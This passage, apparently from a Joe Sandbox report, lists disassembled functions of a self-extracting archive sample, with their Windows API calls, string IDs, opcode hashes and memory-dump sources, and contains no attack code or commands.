                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 2c6034d9c8199c977fdc7bb1fd02bb238f266b6c2aefea8f16bb910580923ebb
                                                              • Instruction ID: d030c2a3510638b495e926f9e81331943907bcc05695b5f0d154e02f09dd3908
                                                              • Opcode Fuzzy Hash: 2c6034d9c8199c977fdc7bb1fd02bb238f266b6c2aefea8f16bb910580923ebb
                                                              • Instruction Fuzzy Hash: B30120327252369FDF214BB9AC84A967BA8FF197B57241631F906F7180DB20DC05C6E0
                                                              APIs
                                                                • Part of subcall function 00E9E105: GetLastError.KERNEL32(?,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E109
                                                                • Part of subcall function 00E9E105: _free.LIBCMT ref: 00E9E13C
                                                                • Part of subcall function 00E9E105: SetLastError.KERNEL32(00000000), ref: 00E9E17D
                                                                • Part of subcall function 00E9E105: _abort.LIBCMT ref: 00E9E183
                                                                • Part of subcall function 00EA04CE: _abort.LIBCMT ref: 00EA0500
                                                                • Part of subcall function 00EA04CE: _free.LIBCMT ref: 00EA0534
                                                                • Part of subcall function 00EA013B: GetOEMCP.KERNEL32(00000000,?,?,00EA03C4,?), ref: 00EA0166
                                                              • _free.LIBCMT ref: 00EA041F
                                                              • _free.LIBCMT ref: 00EA0455
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID: @;
                                                              • API String ID: 2991157371-3452451375
                                                              • Opcode ID: d86bcd12dccc635443a84f0dc6853b73251399b248d15c45318fc0927be3aa18
                                                              • Instruction ID: 126968348bc1dbf583d2abf3d2997b953bac28a585b72c10dbc9f84aca88089b
                                                              • Opcode Fuzzy Hash: d86bcd12dccc635443a84f0dc6853b73251399b248d15c45318fc0927be3aa18
                                                              • Instruction Fuzzy Hash: 4731D631904208AFDB10DFA9D881B9DB7E4FF4E324F255099E614BF291EB71AE40CB50
                                                              APIs
                                                                • Part of subcall function 00E83887: _wcslen.LIBCMT ref: 00E8388F
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D4E
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D5F
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D6F
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D7D
                                                                • Part of subcall function 00E87D46: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E82E75,?,?,00000000,?,?,?), ref: 00E87D98
                                                                • Part of subcall function 00E8FE24: SetCurrentDirectoryW.KERNEL32(?,00E8FFD0,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,00ECFA3A,00000006), ref: 00E8FE28
                                                              • _wcslen.LIBCMT ref: 00E8FFE9
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00ECFA3A,00000006), ref: 00E90022
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\RarSFX0, xrefs: 00E8FFC6
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                              • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0
                                                              • API String ID: 1016385243-711939567
                                                              • Opcode ID: 8e6ac64f94f3f076fefdc3ba36c86fb554879b7cc1fdf251b7b474ac8998cdab
                                                              • Instruction ID: ed6ac1682f51859d8c604499b9a3fdbcae7426e8917322d58d3c00177d4c287f
                                                              • Opcode Fuzzy Hash: 8e6ac64f94f3f076fefdc3ba36c86fb554879b7cc1fdf251b7b474ac8998cdab
                                                              • Instruction Fuzzy Hash: 94015E71D0021869DF25BBA49D4AEDE73FCAF08704F001466F649F2291EAB4D648CBA4
                                                              APIs
                                                              • LoadStringW.USER32(00E8165F,?,?,00E8165F), ref: 00E84CD8
                                                              • LoadStringW.USER32(00E8165F,?,?), ref: 00E84CEF
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID: X+
                                                              • API String ID: 2948472770-3443634675
                                                              • Opcode ID: d4e3550ab6c91666b128d8b4ac5225f26587b7f91ecf576f2d0a9ddfdc22402c
                                                              • Instruction ID: 5f5c7355349a84811c483f3e07ec07e1acfabfa033f9deb3fa1b793dfc43cb94
                                                              • Opcode Fuzzy Hash: d4e3550ab6c91666b128d8b4ac5225f26587b7f91ecf576f2d0a9ddfdc22402c
                                                              • Instruction Fuzzy Hash: A8F0FE7211115ABFDF111F52DC08DAB7F6AFF193907004425FE0DA6131D6329821EB90
                                                              APIs
                                                                • Part of subcall function 00E8386B: _wcslen.LIBCMT ref: 00E83871
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?), ref: 00E82737
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?), ref: 00E8276A
                                                              • GetLastError.KERNEL32(?,?), ref: 00E82787
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: bdc66cdfa979fb2f32df619e89475f1d3dc5f1be776becfaeb7affee08aa5a9f
                                                              • Instruction ID: 3d7587345be0af5594bb68c1c1ec19b34cce81a18222d05c050bcf9ee6f277df
                                                              • Opcode Fuzzy Hash: bdc66cdfa979fb2f32df619e89475f1d3dc5f1be776becfaeb7affee08aa5a9f
                                                              • Instruction Fuzzy Hash: F60124316002106AEF217B764D89BFD339CAF0A788F08141AFB4EF60D0DB65DA848765
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EA0238
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 8d4fd437e9b29dcfa3305cba9787bfa11feeb2d52195f03fd81f92f65e56dc3a
                                                              • Instruction ID: d9266879df498cca0d6ec3f2b750de8c5bdffba337db4a42346b8f8bef99c106
                                                              • Opcode Fuzzy Hash: 8d4fd437e9b29dcfa3305cba9787bfa11feeb2d52195f03fd81f92f65e56dc3a
                                                              • Instruction Fuzzy Hash: 87410B705043489FDF228E64CC84BFABBE9DB5A304F1414EDE59AAB142D235B949CF60
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,6AE85006,00000001,?,000000FF), ref: 00E9F95D
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 29b8088bd5bd70bf504460dbfba1febd1b831f380259520b8aae89b205b49840
                                                              • Instruction ID: 779622655f399e758407487fcc252a7b82a663e84890a31833249090336cac1b
                                                              • Opcode Fuzzy Hash: 29b8088bd5bd70bf504460dbfba1febd1b831f380259520b8aae89b205b49840
                                                              • Instruction Fuzzy Hash: 0801E93250121DBBCF029FA1DC01EEE3F62EF4D764F115114FE0476161CA329931AB94
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E9EE8F), ref: 00E9F8D5
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 8b61a02f13750b522acf33019a3fbb97aa5bddeb63bd1f77f18fd5b6d707d97c
                                                              • Instruction ID: 735478b1183920e5c7caa0b557f25ed30ebd34e1400979f3e8a2cd85b709c48c
                                                              • Opcode Fuzzy Hash: 8b61a02f13750b522acf33019a3fbb97aa5bddeb63bd1f77f18fd5b6d707d97c
                                                              • Instruction Fuzzy Hash: 3BF09A71642318BBCF199F61EC06DAE7BA1EB8DB20B105165F8047A260CB316A209B94
                                                              APIs
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 6d14f632facfcada22cd280cf5e9fcd8aaeade21c2bf6b0de8f09eb9dd55b816
                                                              • Instruction ID: 1d3c28fb849d6c12d196789bfc231a04670737e097b3edbb125abb5caae8caa1
                                                              • Opcode Fuzzy Hash: 6d14f632facfcada22cd280cf5e9fcd8aaeade21c2bf6b0de8f09eb9dd55b816
                                                              • Instruction Fuzzy Hash: 51E0E531B42318BF8B05AFA1AD0696EBBD4DB8EB20B215169F805BB250DD607E0586D9
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 597c7ff31e6200c40201a35b6c78166c136c8abae55da439144cf1ccb4d493aa
                                                              • Instruction ID: 07986d9069bff09c265b00c2a523dae1b9228dc41ac91b05b36ad457ec417117
                                                              • Opcode Fuzzy Hash: 597c7ff31e6200c40201a35b6c78166c136c8abae55da439144cf1ccb4d493aa
                                                              • Instruction Fuzzy Hash: D0B012C129A24A7D394462E69C07CF701FCC0C0B10370713BB400F5281D8402D481031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 305db0f2769cfb656befbdd45d400bbd030a32d9c73e161ac9e9eebbebccd48a
                                                              • Instruction ID: f4115bf1075f58354ad7ea88d86427036268ab916eed30a90ec33eaf3326f245
                                                              • Opcode Fuzzy Hash: 305db0f2769cfb656befbdd45d400bbd030a32d9c73e161ac9e9eebbebccd48a
                                                              • Instruction Fuzzy Hash: B4B012C229A14E7D390462A69C07C7701FCC0C0B10370713FB400F5281D8402D085031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 4716f5579066f8c5335b3dc901ab5e93a0366d25e65d1c05b606ba2b28eae720
                                                              • Instruction ID: e4227e49564e86df6b112818ede3b42d0766c876240f8d54ac1d5def5f3195b0
                                                              • Opcode Fuzzy Hash: 4716f5579066f8c5335b3dc901ab5e93a0366d25e65d1c05b606ba2b28eae720
                                                              • Instruction Fuzzy Hash: F7B012C129B14A7D3A0492A69D07C7701FCC0C0B10771703BB400F52C1D8402E090031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: aed9eba815d201c1ac333ef71cc90fd40082f2f2d0b2d23a64dec0ab012e60fe
                                                              • Instruction ID: 339b906380d9fa0b470336b05d26082aec44f91c22aa48dfdf87074d74411505
                                                              • Opcode Fuzzy Hash: aed9eba815d201c1ac333ef71cc90fd40082f2f2d0b2d23a64dec0ab012e60fe
                                                              • Instruction Fuzzy Hash: 2EB012C129A14A7D3D0462B69C07C7701FCC0C0B10370B03BB800F5281D9402D081031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: dff164095cc17264171e2eaccc98c8b2aa86ae295eb5d1552710a18a22e81dcf
                                                              • Instruction ID: 2217a5d483af3eb43c63703d65675cf837dfeda88de425f6753304a3ee246bf4
                                                              • Opcode Fuzzy Hash: dff164095cc17264171e2eaccc98c8b2aa86ae295eb5d1552710a18a22e81dcf
                                                              • Instruction Fuzzy Hash: E0B012C12AB14A7D390492A69C07C7701FCC4C0B10771703FB400F5181D8402D084031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: f76e933c219d8aff03c7e4224adb8bc27475313f459ea6f0e60026bddec380db
                                                              • Instruction ID: 57acff94891852388f96a89b2f1079520a7e686436921d238b00b4543e726d40
                                                              • Opcode Fuzzy Hash: f76e933c219d8aff03c7e4224adb8bc27475313f459ea6f0e60026bddec380db
                                                              • Instruction Fuzzy Hash: 61B002E529A14A7D7A0452B79D4BC7701BCD5C4B11371753FB801F5195A9506E495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 071ef481d6df7115fd80e684cf0786e4424e12d4d2f7eb758fbe4d0e02121b7c
                                                              • Instruction ID: c47771579c43254f7f3bc0e813dcb1bf58fb273f54cbfff8e14b434e542d8b02
                                                              • Opcode Fuzzy Hash: 071ef481d6df7115fd80e684cf0786e4424e12d4d2f7eb758fbe4d0e02121b7c
                                                              • Instruction Fuzzy Hash: EFB012D139A14A7D390452A69C07C7701FCC0C0B10370703FB400F5185D8402D088031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93A54
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 3Qo
                                                              • API String ID: 697777088-1944013411
                                                              • Opcode ID: eaeaa6c83c81eaa2e423852c13441de7655749d9bb66985def4757e19be7fbf9
                                                              • Instruction ID: 83269780a9a8b86810db2159ede0f9dce096aeb7563f11d2bfd9b21401b2fef0
                                                              • Opcode Fuzzy Hash: eaeaa6c83c81eaa2e423852c13441de7655749d9bb66985def4757e19be7fbf9
                                                              • Instruction Fuzzy Hash: 63B012C52982457E3A04A1A29C07CF705ACC0C0F103B0721BB800F018294906E481031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: ad07cbec4a9253b50612a0b313c6f1243032eae7d4f298ab541f6fa485492b96
                                                              • Instruction ID: e0b72de9f876d37f905f512bd816c457d11805a455ecc3998b14ac0bc8efc4e0
                                                              • Opcode Fuzzy Hash: ad07cbec4a9253b50612a0b313c6f1243032eae7d4f298ab541f6fa485492b96
                                                              • Instruction Fuzzy Hash: CAB012C12992497D3A0492A69C43CF701FCC0C0B103B0713BB801F5181D8402E4C0031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 5e6fe9f8ccc80ce2155ea13e5e4ee379ab5ef60782000f9f9cea0d8a4f2407b6
                                                              • Instruction ID: 844606aedb3e6107ad38ef81e59dd2ddc64fb6cbaebb9b08e97bc0decd658fad
                                                              • Opcode Fuzzy Hash: 5e6fe9f8ccc80ce2155ea13e5e4ee379ab5ef60782000f9f9cea0d8a4f2407b6
                                                              • Instruction Fuzzy Hash: CAB012C1299149BD3D4452A69C43C7701FCC0C0B103B0B03BB800F5181D8402E080031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 27e7da00a07b3d1edc70f686c540ce913da6ee74c0c03d3fbc225d8e32b9c04b
                                                              • Instruction ID: b9cac3b4c7c63bbff61cd1a6b7568e7bfaad6df134a6e53700bc5389f63528e0
                                                              • Opcode Fuzzy Hash: 27e7da00a07b3d1edc70f686c540ce913da6ee74c0c03d3fbc225d8e32b9c04b
                                                              • Instruction Fuzzy Hash: B2B012D139A14A7D3D0452A69C07C7702FCC0C0B10370B03BB800F5185D8402D080031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 258efa9bef1d362c4a3f7086df43929c0eb53be9467b112f75de89e6aeff45c9
                                                              • Instruction ID: 60ba5ffb21908483e6a74781a0a81a26defba39197a8e197eba82e150ed4e9d9
                                                              • Opcode Fuzzy Hash: 258efa9bef1d362c4a3f7086df43929c0eb53be9467b112f75de89e6aeff45c9
                                                              • Instruction Fuzzy Hash: D6B012C129A14A7D390452A79C07C7701FCC0C0B10370743FB400F51C1D8402D084031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: c960b4cc6950e9205a883e9344f53f270fdc0f783fd4ec117f2c45b4cd9d1124
                                                              • Instruction ID: a3f18bb9431c8039d5ef0d0c06e39eaec6f8056aa19ae7831c3cb2d30f498da3
                                                              • Opcode Fuzzy Hash: c960b4cc6950e9205a883e9344f53f270fdc0f783fd4ec117f2c45b4cd9d1124
                                                              • Instruction Fuzzy Hash: 53B012D139A14A7D3A0452A69D47C7701FCC0C0B10370703BB400F52C5E8412E090031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 02a6af742567cfcaa86b8aef431b01dc21ba660495a9548bf27e61d0fe587fb4
                                                              • Instruction ID: 73f508d070b7a510377f4c1915d2acd7eb760aa315050f2189ccaa76f52cf7d7
                                                              • Opcode Fuzzy Hash: 02a6af742567cfcaa86b8aef431b01dc21ba660495a9548bf27e61d0fe587fb4
                                                              • Instruction Fuzzy Hash: B0B012C129A24A7D394452A79C07CF701FCC0C0B10370B17BB400F5181D8402D480031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 78d606f98e38fddd7023035a8d8abaf20602165fcf7cfe478a63dd1ab327d95f
                                                              • Instruction ID: 6447eac94b72b676311abbbd0f828d4baee5ca6a88040da7bcd66cd23b9b4663
                                                              • Opcode Fuzzy Hash: 78d606f98e38fddd7023035a8d8abaf20602165fcf7cfe478a63dd1ab327d95f
                                                              • Instruction Fuzzy Hash: 59B012C129A14A7D3D0452A79C07C7701FCC0C0B10370B03BB800F5181D8402D080031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
